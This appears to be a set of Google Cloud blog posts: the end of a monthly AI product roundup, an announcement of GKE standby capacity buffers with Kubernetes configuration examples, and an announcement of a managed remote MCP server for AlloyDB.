5. Protecting the agentic enterprise: Security built for the AI era. Our full-stack AI approach, from the chips to the models, gives you a competitive advantage with better integration and velocity to help protect customers. Not only can Google action insights from the world’s largest threat observatory and Mandiant frontline experts, but we also bring cutting-edge insights and breakthroughs from Google DeepMind, to help make your platforms more secure.

Agentic defense: Three new agents in Google Security Operations can help hunt threats, engineer detections, and provide context on third parties. You can build your own security agents with remote Google Cloud model context protocol (MCP) server support for Google Security Operations, now generally available. You can also access the MCP server client directly from the Google Security Operations chat interface, available in preview.
Protecting AI and cloud apps across any infrastructure with Wiz: Newly expanded AI coverage helps build secure agents across clouds and AI studios. New AI-Bill of Materials in development tools can help secure AI-generated code and mitigate the risk of shadow AI. Learn more.
Securing agents and the agentic web: Model Armor can integrate with Agent Gateway, and new Agent Identities provide more layers of defense against shadow AI. Google Cloud Fraud Defense, the next evolution of reCAPTCHA, offers agent-specific capabilities that can help secure the agentic web as well as the entire user and customer journey.
Trusted Cloud: We’re simplifying permissions with modern IAM, and advancing Google Cloud security with new capabilities in Security Command Center plus new innovations in data and network security.
New partner-supported workflows for Google Security Operations: This new robust cohort of partner integrations includes partners developing their own agentic security operations centers (SOCs).

You can catch up on all our security announcements from Next ‘26 here.

News you can use

Guide to prompting Gemini 3.1 Flash TTS (text-to-speech): The new TTS model introduces a high level of controllability by allowing you to steer the delivery using more than 200 audio tags. We'll share how to get strong results from the model, whether you are building accessible gaming soundtracks, banking systems, or audiobooks. Learn more about the model here.
Ultimate prompting guide for Lyria 3 models: Lyria 3, Google's family of music-generation models, is designed to give you granular control over vocals, instrumentation, and arrangement. So we spent weeks testing against every musical genre and use case we could imagine. We put together this guide to share exactly what we learned and how you can get the best results.
How to find the sweet spot between cost and performance: This guide will walk you through Google Cloud's flexible gen AI infrastructure options, showing you how to find that sweet spot on the efficient frontier between cost and performance. We'll start with the foundational pay-as-you-go (PayGo) models and then explore how to layer on more specialized options to build a robust and cost-effective gen AI strategy.
Essential AI and cloud security now on by default: To support the next generation of AI innovators, we are offering on by default essential AI security and cloud security in Security Command Center Standard.
Securing AI inference on GKE with Model Armor: Here’s how to secure AI inference on Google Kubernetes Engine with Model Armor and high-performance storage.
Cloud CISO Perspectives: AI, security, and the workforce of the future: You can’t bring traditional security to an AI fight, so how do we defend against AI-powered attacks, boost defenders with AI, and secure AI use? Drop in on this RSA Conference fireside chat between Francis deSouza, Google Cloud COO and President, Security Products, and Nick Godfrey, senior director, Office of the CISO.

March

March was a busy month for our AI teams. We launched Gemini Embedding 2, rolled out a highly cost-effective Veo 3.1 Lite model, and officially welcomed the Wiz team to Google Cloud to help redefine security in the AI era.

Alongside these launches, we created comprehensive guides to help you get the most out of these models, from prompting formulas for Nano Banana 2, to practical advice for optimizing your TPU training. Here’s a quick look at the latest news and resources to help your team build what’s next.

Top hits:

Gemini Embedding 2: Our first natively multimodal embedding model: Gemini Embedding 2 is our first natively multimodal embedding model that maps text, images, video, audio and documents into a single embedding space, enabling multimodal retrieval and classification across different types of media — and it’s available now in public preview.
Build with Veo 3.1 Lite, our most cost-effective video generation model: This model empowers developers to build high-volume video applications, at less than 50% of the cost of Veo 3.1 Fast, but with the same speed. This rounds out the Veo 3.1 model family, giving developers flexibility based on needs. For Cloud customers, it’s now available on Vertex AI.

Here’s a fun bonus: Check out our ultimate prompting guide for Veo 3.1 to get started.

Welcoming Wiz to Google Cloud: Redefining security for the AI era: Google has completed its acquisition of Wiz, a leading cloud and AI security platform. The Wiz team will join Google Cloud, and we will retain the Wiz brand. With the addition of Wiz, we will provide customers with a comprehensive platform to secure their cloud and hybrid environments, as well as accelerate threat prevention, detection, and response.
Gemini 3.1 Flash Live: Making audio AI more natural and reliable: We’ve improved 3.1 Flash Live’s overall quality, making it more reliable for developers and enterprises to build voice-first agents that can complete complex tasks at scale. On ComplexFuncBench Audio, a benchmark that captures multi-step function calling with various constraints, it leads with a score of 90.8% compared to our previous model.

News you can use:

The ultimate Nano Banana prompting guide: This is a must-read for anyone working with Nano Banana. We spent weeks testing Nano Banana 2 and Nano Banana Pro against every use case we could imagine to test its limits. We put together this guide to share exactly what we learned and how you can get the best results. Here’s an example formula: [Reference images] + [Relationship instruction] + [New scenario]

A developer’s guide to training with Ironwood TPUs: In this guide, we hear from Lillian Yu, CPA, CA , Product Strategy and Operation, and Liat Berry, Product Manager, on five strategies within the JAX and MaxText ecosystems designed to help developers refine training efficiency and hit peak performance on Ironwood hardware.
How to build production-ready AI agents with Google-managed MCP servers: In this guide, we anchor on a specific example. Cityscape is a demo agent built with Google's Application Development Kit (ADK) that turns a simple text prompt — like "Generate a cityscape for Kyoto" — into a unique, AI-generated city image. Check out the guide to learn more.

February

In February, we’re giving developers more reasoning power with Gemini 3.1 Pro and Claude 4.6, and faster creative scaling with Nano Banana 2. We’re also opening up new training programs and step-by-step guides to help you tackle the hardest parts of the AI lifecycle, from capacity planning to mounting defenses against AI-powered attacks.

Here’s a rundown of our latest news, tools, and resources to help you build what’s next.

Top hits

Pro-level image generation gets faster and more accessible with Nano Banana 2: To build creative that stands out, you need models that naturally integrate into your workflows and scale with ease. Check out our blog to see how this comes to life (and how customers are putting the model to work).

Introducing Gemini 3.1 Pro on Google Cloud: Gemini 3.1 Pro is a clear step forward in reasoning, designed to solve tougher problems, giving you the reasoning depth your business needs. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Announcing Claude Opus 4.6 and Claude Sonnet 4.6 on Vertex AI: Now generally available on Vertex AI, explore our sample notebook to get started and visit our documentation for comprehensive pricing and regional availability details.
New AI threats report: Distillation, experimentation, and integration: John Hultquist, chief analyst, Google Threat Intelligence Group, details what security leaders should know from our newest AI threat report on experimentation, integration, and distillation attacks.

News you can use

A developer's guide to production-ready AI agents: To help developers work through these challenges, we've published a collection of guides covering the full agent lifecycle. These resources first appeared during Kaggle’s 5 days of AI Agents Intensive, and they’ve proven so popular and useful, we wanted to make sure a wider audience had access, as well.
Gemini Enterprise Agent Ready (GEAR) program now available: We opened the Gemini Enterprise Agent Ready (GEAR) learning program to everyone. As a new specialized pathway within the Google Developer Program, GEAR empowers developers and pros to build and deploy enterprise-grade agents with Google AI.
Your guide to Provisioned Throughput (PT) on Vertex AI: Check out this deep-dive blog designed to show you the resources available to you today on Vertex AI, and how you can get started capacity planning.
How AI can boost defenders, from defense in depth to the cyber kill chain (Q&A): We know that defenders are also developing powerful AI tools, but what’s still unknown is what it could mean for enterprise software ownership if companies have to constantly mount AI-directed defenses at AI-powered attacks?

Janurary

We used to have to learn the language of computers. In 2026, they’re learning ours.

We kicked off the year by exploring the future of agentic commerce, where AI agents navigate the web to find and buy products for us. Our leaders call this the "invisible shelf" — a world where commerce isn't tied to a specific website. To make this reality scalable, we announced the Universal Commerce Protocol (UCP), a shared language that allows agents and retailers to understand each other.

We brought that same fluency to our creative and technical tools:

Updates to Veo 3.1 allow creators to use simple inputs — like reference images — to generate precise, mobile-ready video.
Natural language queries: With Comments to SQL in BigQuery, we’re removing the language barrier to data. Engineers can now write queries by describing their intent in natural language, prioritizing the question over the code.

Let’s dive in.

Top hits

1. Gemini Enterprise for Customer Experience (CX): Specifically built for agentic retail, this platform transforms fragmented search, commerce and service touch points into one seamless journey — whether you need a shopping assistant, a support bot, agentic search or help with merchandising.

2. We announced Universal Commerce Protocol (UCP): A new open standard for agentic commerce that works across the entire shopping journey — from discovery and buying to post-purchase support. UCP establishes a common language for agents and systems to operate together across consumer surfaces, businesses and payment providers. So instead of requiring unique connections for every individual agent, UCP enables all agents to interact easily. UCP is built to work across verticals and is compatible with existing industry protocols like Agent2Agent (A2A), Agent Payments Protocol (AP2) and Model Context Protocol (MCP).

3. We updated Veo 3.1, including improvements to Ingredients to Video and Portrait mode: Veo is getting more expressive, with improvements that help you create more fun, creative, high-quality videos based on ingredient images, built directly for the mobile format. This includes:

Improvements to Veo 3.1 Ingredients to Video, our capability that lets you create videos based on reference images.
Native vertical outputs for Ingredients to Video (portrait mode) to power mobile-first, short-form video creation.
State-of-the-art upscaling to 1080p and 4K resolution 1 for high-fidelity production workflows.

These updates are launching in the Gemini app, YouTube, Flow, Google Vids, the Gemini API and Vertex AI.

4. Vibe querying with comments-to-SQL: Crafting complex SQL queries can be challenging. Often, engineers simply want to express their data needs in plain English directly within their SQL workflow. That’s why we’re introducing Comments to SQL in BigQuery. This feature makes writing queries using natural language – ‘vibe querying’ – a reality. Learn more in the blog.

News you can use

Mastering Gemini CLI: Your complete guide from installation to advanced use-cases: We’ve teamed up with DeepLearning.ai and are excited to announce a free course – Gemini CLI: Code & Create with an Open-Source Agent. This course isn’t just for developers; we dive into practical use cases for various tasks such as data analysis, content creation, and personalized learning.
How Google SREs use Gemini CLI to solve real-world outages: In this article, we’ll delve into real scenarios that Google SREs are solving today using Gemini 3 (our latest foundation model) and Gemini CLI—the go-to tool for bringing agentic capabilities to the terminal.
Getting started with Gemini 3: Deploy your first Gemini 3 app to Google Cloud Run: In this blog, we will show you how to vibe code your first app—which leverages the Gemini 3 Flash Preview model and deploy it as a publicly accessible URL on Google Cloud Run. Google AI Studio lets you go from idea to app quickly by using natural language to generate fully functional apps using the power of Gemini 3.
Practical guidance: Building with the Secure AI Framework (SAIF) on Google Cloud: We know that security and data privacy are the top concern for executives when evaluating AI providers, and security is the top use case for AI agents in a majority of industries. To help you build AI boldly and responsibly, here’s our guide to developing AI with the Secure AI Framework (SAIF) on Google Cloud.
The truths about AI hacking that every CISO needs to know (Q&A): How will AI boost threat actors? And what can chief information security officers do about it? Google’s Heather Adkins, vice-president, Security Engineering, explores how securing the enterprise is about to change.

Introducing the GKE standby buffer: Improve node startup times without blowing your budget

Mon, 01 Jun 2026 16:00:00 +0000

Application owners and platform engineers have long faced a difficult choice: spend excessively by over-provisioning to guarantee quick startups, or minimize costs but endure slow cold starts.

We are excited to announce a solution to this compromise: Google Kubernetes Engine standby buffers. This builds on the launch of GKE active buffers earlier this year, a native version of the Kubernetes CapacityBuffers API that makes it easy to provision readily available capacity to handle traffic spikes, delivering near-zero startup latency for new pods. However, active buffers still impose a trade-off between performance and cost. New GKE standby buffers help by maintaining a low-cost, suspended capacity buffer for your GKE clusters. With a cost overhead in the low single-digit percent, GKE standby buffers help you achieve near-immediate scheduling for your workloads with negligible cost overhead. This is useful for all kinds of workloads — general-purpose, agentic, and everything in between.

Under identical traffic loads, the cluster without standby buffers suffered severe latency spikes, with P50, P95, and P99 metrics trapped between 4 and 6 minutes. Conversely, the cluster with standby buffers maintained a P50 latency of just single-digit seconds, while its P95 and P99 metrics briefly peaked at one minute before quickly normalizing to single-digit seconds. Both setups exhibited a similar allocatable core cost, making the buffered approach far more efficient.

The problem: High costs and latency

Traditionally, autoscaling with standard Kubernetes has been effective but slow. Traffic surges or batch jobs require cluster autoscalers to provision fresh nodes, leaving Pods in a pending state. To circumvent delays, you have to resort to clunky workarounds like lowering your Horizontal Pod Autoscaler (HPA) thresholds or managing so-called balloon pods. These workarounds are expensive:

Managing balloon pods is operationally complex, requiring manual configuration and ongoing maintenance of priority classes and resource requests to ensure they function correctly.
Lowering the HPA threshold adds empty (wasted) space that linearly scales with the size of the node pool.

Both GKE active and standby buffers allow capacity to be defined declaratively, removing the need for clunky and operationally heavy workarounds.

In addition, GKE standby buffers lower infrastructure costs by storing the node’s state to disk, releasing compute and memory costs and keeping only persistent disk and IP address costs. Then, combined with an active buffer, you can achieve near-instant pod scheduling that has similar performance to over-provisioning, but at a very affordable price.

Active and standby buffers working together

All GKE capacity buffers operate on a principle similar to video streaming on platforms like YouTube. By proactively attempting to provision and manage available capacity ahead of impending demand (much like pre-downloading video content) GKE helps to ensure that resources are readily available when they’re needed.

With today’s launch, the two types of capacity buffers can work in harmony:

Active buffer: Cluster Autoscaler works to reserve enough capacity for a predefined amount of pods on existing cluster nodes, and, if needed, provisions extra nodes. Select this ready-to-use buffer to provide capacity to your most latency-sensitive workloads.
Standby buffers: Nodes are pre-provisioned and fully initialized with necessary components like Kubernetes DaemonSets, and given time to preload images, but are then suspended, while the underlying compute capacity is released to save costs. When demand spikes, these nodes resume 2-3x faster than creating a fresh node, bridging the gap between cold starts and always-on capacity.

The active buffer covers the initial spike until standby buffers resume. The system prioritizes refilling the active buffer from the standby buffer. The standby buffer handles an extended load and protects against slower node cold starts. As standby buffers refill, they initially kick into an active state for a configurable amount of time before they are suspended, providing a boost of active capacity during sustained traffic loads.

Early benchmarks

In our tests, using standby buffers enabled us to deliver sub-second Agent Sandbox scheduling latency for up to 90% lower cost compared to complete overprovisioning.

Optimized for business needs

Businesses are under constant pressure to optimize resource consumption while streamlining operations. Recognizing that organizations need smarter tools to manage sporadic and spikey workloads, we worked hard to deliver standby buffers quickly. Now, whether you’re running agents, batch jobs, CI/CD pipelines, game servers, or spiky workloads, GKE capacity buffers allow you to dynamically balance performance and cost. You can finally define your "insurance policy" against traffic spikes without paying a high premium for it. With GKE standby buffers you can:

Circumvent cold starts: Nodes suspended by standby buffers resume 2-3x faster than provisioning fresh nodes, reducing pod scheduling latency during traffic spikes and sustained traffic load.
Enjoy lower costs: A standby buffer incurs a fraction of the cost of active capacity because the underlying VM is suspended. You pay for storage and an IP address, rather than for full compute-hours.
Gain declarative control: Replace complex balloon pod workarounds with the simple, native declarative CapacityBuffers API, explicitly stating how much headroom you need, and letting GKE handle the rest.

“Using GKE standby capacity buffers has lowered our time-to-ready from several minutes to 30 seconds at a very affordable price.”
- Pedro Spagiari, Chief Architect at Unico

Get started

Ready to improve your performance and save on costs?

Start by defining a CapacityBuffer resource in your cluster to specify your target buffer size.
Try balancing between standby buffers to reduce pod scheduling latency for sustained loads, and active buffers to address immediate unpredictable capacity needs.

Let’s look at an example of how to configure buffers for a Deployment while also using custom ComputeClasses.

Basic setup

Beginning with some basic setup, create a namespace:

code_block: <ListValue: [StructValue([('code', 'apiVersion: v1\r\nkind: Namespace\r\nmetadata:\r\n name: my-namespace'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79f5bb520>)])]>

Then, create a custom ComputeClass (optional):

code_block: <ListValue: [StructValue([('code', 'apiVersion: cloud.google.com/v1\r\nkind: ComputeClass\r\nmetadata:\r\n name: my-ccc\r\n namespace: my-namespace\r\nspec:\r\n # Buffers will also be created according to these priorities \r\n priorities:\r\n - machineFamily: n4\r\n - machineFamily: n4d\r\n - machineFamily: c4\r\n - machineFamily: c4d\r\n nodePoolAutoCreation:\r\n enabled: true'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79f5bba30>)])]>

Define the buffer unit size

You can use a PodTemplate as a reference for the buffer unit size. You can also create a buffer for a specific deployment or any object that defines scale subResource.

code_block: <ListValue: [StructValue([('code', '# Defines the resource requirements for one unit of buffer.\r\napiVersion: v1\r\nkind: PodTemplate\r\nmetadata:\r\n name: my-buffer-unit-template\r\n namespace: my-namespace\r\ntemplate:\r\n spec:\r\n terminationGracePeriodSeconds: 0\r\n tolerations:\r\n # Optional: Ensures buffer pods can land on any node.\r\n - key: "node-role.kubernetes.io/master"\r\n operator: "Exists"\r\n effect: "NoSchedule"\r\n containers:\r\n - name: buffer-container\r\n image: registry.k8s.io/pause:3.9\r\n resources:\r\n requests:\r\n cpu: "1"\r\n memory: "1Gi"\r\n limits:\r\n cpu: "1"\r\n memory: "1Gi"\r\n # Optional: Using buffers with a custom ComputeClass / \r\n # controls the properties of the nodes GKE provisions. \r\n nodeSelector:\r\n cloud.google.com/compute-class: my-ccc'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79f5bbdf0>)])]>

Create buffers

Lastly, create a CapacityBuffer object by referring to our PodTemplate. Here, you create a standby buffer of 50 CPUs and 50 GB of RAM:

code_block: <ListValue: [StructValue([('code', 'apiVersion: autoscaling.x-k8s.io/v1beta1\r\nkind: CapacityBuffer\r\nmetadata:\r\n name: my-standby-buffer-resource-limits\r\n namespace: my-namespace\r\n annotations:\r\n # Optional: Time after which buffer nodes are suspended.\r\n # Default is 5 minutes. \r\n buffer.gke.io/standby-capacity-init-time: "5m"\r\n # Optional: Time after which standby buffers are recreated.\r\n # Default is 1 day, "never" avoids refreshing. \r\n buffer.gke.io/standby-capacity-refresh-frequency: "1d"\r\nspec:\r\n podTemplateRef:\r\n name: my-buffer-unit-template\r\n # The desired state is 20 standby buffer units.\r\n # When a standby buffer gets used, a new one gets created.\r\n limits:\r\n cpu: "50"\r\n memory: "50Gi"\r\n provisioningStrategy: "buffer.gke.io/standby-capacity"'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79e2d5be0>)])]>

And an active buffer of seven 5 CPUs and 5 GB of RAM (optional):

code_block: <ListValue: [StructValue([('code', 'apiVersion: autoscaling.x-k8s.io/v1beta1\r\nkind: CapacityBuffer\r\nmetadata:\r\n name: my-active-buffer-resource-limits\r\n namespace: my-namespace\r\nspec:\r\n podTemplateRef:\r\n name: my-buffer-unit-template\r\n # The desired state is 2 active buffer units.\r\n # When an active buffer gets used, a new one gets created. \r\n limits:\r\n cpu: "5"\r\n memory: "5Gi"\r\n provisioningStrategy: "buffer.x-k8s.io/active-capacity"'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79e2d5df0>)])]>

Finally, apply the above objects to your cluster. That’s it!

Now, any existing and future deployments that can schedule on the space reserved by the buffers will benefit from faster pod scheduling latencies.

Test the buffers

You can check on the status of your buffers. In Kubernetes, suspended nodes can be identified by condition Suspended.

code_block: <ListValue: [StructValue([('code', 'kubectl get nodes -o custom-columns=\'NAME:.metadata.name,SUSPENDED:.status.conditions[?(@.type=="Suspended")].status\''), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79ca76850>)])]>

Expect the following kind of output, and wait for the standby buffers to get suspended.

code_block: <ListValue: [StructValue([('code', 'NAME SUSPENDED\r\ngke-my-cluster-nap-n4-standard-8-k960-...-ffbx False # Node has been resumed.\r\ngke-my-cluster-nap-n4-standard-4-k960-...-h2x4 <none> # Node was never suspended.\r\ngke-my-cluster-nap-n4d-standard-8-1cip-...-74jf True # Node is suspended.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79ca76d90>)])]>

To test the buffers, create a deployment and scale it.

code_block: <ListValue: [StructValue([('code', 'apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n name: my-deployment\r\n namespace: my-namespace\r\nspec:\r\n replicas: 1\r\n selector:\r\n matchLabels:\r\n app: my-deployment\r\n template:\r\n metadata:\r\n labels:\r\n app: my-deployment\r\n spec:\r\n containers:\r\n - name: busybox\r\n image: busybox\r\n command: ["sleep", "inf"]\r\n resources:\r\n requests:\r\n cpu: "500m"\r\n memory: "500Mi"\r\n # Optional: Using buffers with a custom ComputeClass /\r\n # controls the properties of the nodes GKE provisions. \r\n nodeSelector:\r\n cloud.google.com/compute-class: my-ccc'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79ca76f40>)])]>

Scaling this deployment to two replicas allows them to be assigned to the active buffer for immediate scheduling. The active buffer is then immediately refilled from the standby buffer. Simultaneously, the standby buffer initiates the provisioning of new nodes.

If you further scale the deployment to 50 replicas, scheduling all of them on the standby buffer occurs once the nodes resume. New nodes provisioned to refill the standby buffer briefly function as active buffers providing a temporary active standby boost. Therefore, when further scaling the deployment to 100 replicas during this time, you may notice that new replicas benefit from immediate scheduling.

GKE standby buffer best practices

When working with GKE standby buffers, here are a few things to consider:

Define standby buffers that are sufficient to cover the extended load you expect to encounter, so that buffers can refill in the background from a cold start. A sufficiently sized standby buffer can drop your max pod scheduling latency to the time it takes to resume a node — around 30 seconds.
When the buffer starts to get used and is refilled, new buffer nodes initially swing into an active state prior to suspending. This helps to boost active capacity during a prolonged load.
If your application requires the lowest possible pod scheduling latency, define an active buffer size that is sufficient to cover any initial spikes you expect to encounter until standby buffer nodes are able to resume. The system prioritizes refilling the active buffer by consuming the standby buffer. A sufficiently sized active buffer and a sufficiently sized standby buffer can help you achieve one-second pod scheduling latency for a fraction of the cost of overprovisioning.
Experiment with different buffer sizes to get the best result for your workload.

To help, we created a simulator to help with sizing the buffers to achieve your performance targets, available at https://github.com/gke-labs/buffers-simulator.

Try it yourself!

Active and standby buffers in GKE provide a native solution for low-latency and cost-effective workload scaling by maintaining warm and standby capacity buffers. By circumventing slow node cold starts, buffers help performance-critical applications handle sudden traffic spikes. This feature replaces complex manual workarounds like balloon pods with a simple, declarative API, and allows for fixed, percentage-based, or resource-limited buffering strategies to help maintain strict service-level objectives cost-effectively and without over-provisioning for peak.

Standby buffers are available for GKE clusters running version 1.36.0-gke.2253000 or later. To get started with buffers, check out the documentation.

The fully-managed Remote MCP Server for AlloyDB is now Generally Available

Mon, 01 Jun 2026 16:00:00 +0000

AI agents possess incredible reasoning capabilities and can perform increasingly complex actions. But the reliability of agentic outcomes depends entirely on the quality of the context they can access — context that is frequently locked away in operational databases.

To bridge this gap, we are excited to announce the Remote Model Context Protocol (MCP) Server for AlloyDB is now generally available.

The Model Context Protocol (MCP) is an open-source standard that gives LLMs a secure, consistent way to connect to external data sources. As part of Google Cloud’s recent rollout of 50+ Google-managed MCP servers, this new integration makes it easier than ever for both interactive and autonomous agents to securely harness the full power of your enterprise data. For example, you can now ask an AI agent for an up-to-the-millisecond view of your delivery fleet by connecting it to your real-time logistics data in AlloyDB, avoiding inaccuracies due to stale data and reducing the need for manual reporting.

Why AlloyDB is the strong foundation for agentic apps

By connecting MCP to AlloyDB, your agents get access to the premier database built for enterprise-grade AI. AlloyDB delivers the scale, speed, and intelligence required for the most demanding agentic workloads:

Supercharged vector performance: Scale to over 10 billion vectors at up to 6x the speed of standard PostgreSQL for vector queries (and up to 10x faster for filtered queries) with the ScaNN index.
Advanced search and reranking: Power multimodal applications with hybrid search via RUM (in Preview) and intelligent reranking through Reciprocal Rank Fusion (RRF) or Gemini Enterprise Platform models.
Real-time intelligence: Efficiently generate millions of embeddings using built-in AI Functions to facilitate low-latency, real-time agentic experiences.
Unified data access: Give agents a single PostgreSQL interface to seamlessly join operational data in AlloyDB with analytical data in BigQuery or archived data in Iceberg tables via Lakehouse Federation.
Enterprise-grade scale: Rest easy with a 99.99% SLA, autopilot database optimizations, and auto-scaling read pools with up to 20 nodes.

Why Remote MCP matters for AlloyDB

Local MCP servers are great for local development, but communicating over standard input/output (stdio) streams becomes difficult when you scale to production workloads. It is both architecturally complex and administratively burdensome to provision and manage all of the infrastructure and security guardrails you need to run agents for high-value use cases that interact with sensitive operational data.

The Remote MCP Server for AlloyDB runs on fully-managed Google Cloud infrastructure and exposes an HTTP endpoint that connects your AI applications to your data. This solves key challenges for teams building agents on PostgreSQL:

Centralized discovery: Find, secure, and manage your database's MCP server using Agent Registry.
Fully-managed HTTP endpoints: No need to deploy or maintain the infrastructure required for connectivity. Configure your agent to use the endpoint to get started.
Fine-grained authorization: Instead of using shared database passwords or API keys, you use Identity and Access Management (IAM) to restrict agents to specific tables, schemas, or views. With the read-only execute SQL tool, you can prevent your agent from making accidental changes and deletions from your database.
Operational instance management: The AlloyDB toolset gives agents the ability to do more than run queries. Agents can update instances, export and import data, create backups, and restore clusters.
Model Armor protection: Model Armor provides optional prompt and response security to screen and filter data, defending against prompt injections or accidental data exfiltration.
Audit logging: Every query, action, and tool call goes to Cloud Audit Logs, giving security teams a full audit trail.

Let's see it in action: A quick demo

Getting started with the AlloyDB Remote MCP server is a straightforward process. To see it in action in your own environment, you can follow our new Codelab, which guides you through these essential steps:

API & environment prep: Enable the AlloyDB, Compute Engine, and Gemini Enterprise APIs in your Google Cloud project.
Provision your database: Deploy your AlloyDB cluster, create your database, and import your sample data.
Enable data access API: Permit the Data Access API on your AlloyDB instance.
Connect the agent: Configure your MCP client by providing the remote endpoint (https://alloydb.googleapis.com/mcp). Pass your Google Cloud IAM credentials using an OAuth 2.0 bearer token in the HTTP Authorization header.

Once the connection is established, your agent can provide reliable, grounded answers to complex business questions using your real-time operational data. By performing introspection queries, the agent automatically understands your database schema – including tables and columns – enabling it to construct sophisticated joins and queries to fulfill user requests accurately.

Once your agent has access to the AlloyDB toolset, it can execute queries, analyze operational trends, and dynamically rank text data using AlloyDB AI functions like AI.RANK().

Security remains paramount: the Remote MCP Server for AlloyDB integrates seamlessly with Model Armor. This provides protection against sensitive data leaks, even if the agent’s service account possesses broad access permissions within the database.

Watch the full demo below!

What's next

By enabling agents to interact securely with transactional data, we are embracing an architecture where AI agents can reliably access and act upon your enterprise’s single source of truth.

Ready to build? Discover AlloyDB with a 30-day free trial, and dive into the Remote MCP for AlloyDB Codelab to start powering your enterprise agentic applications today.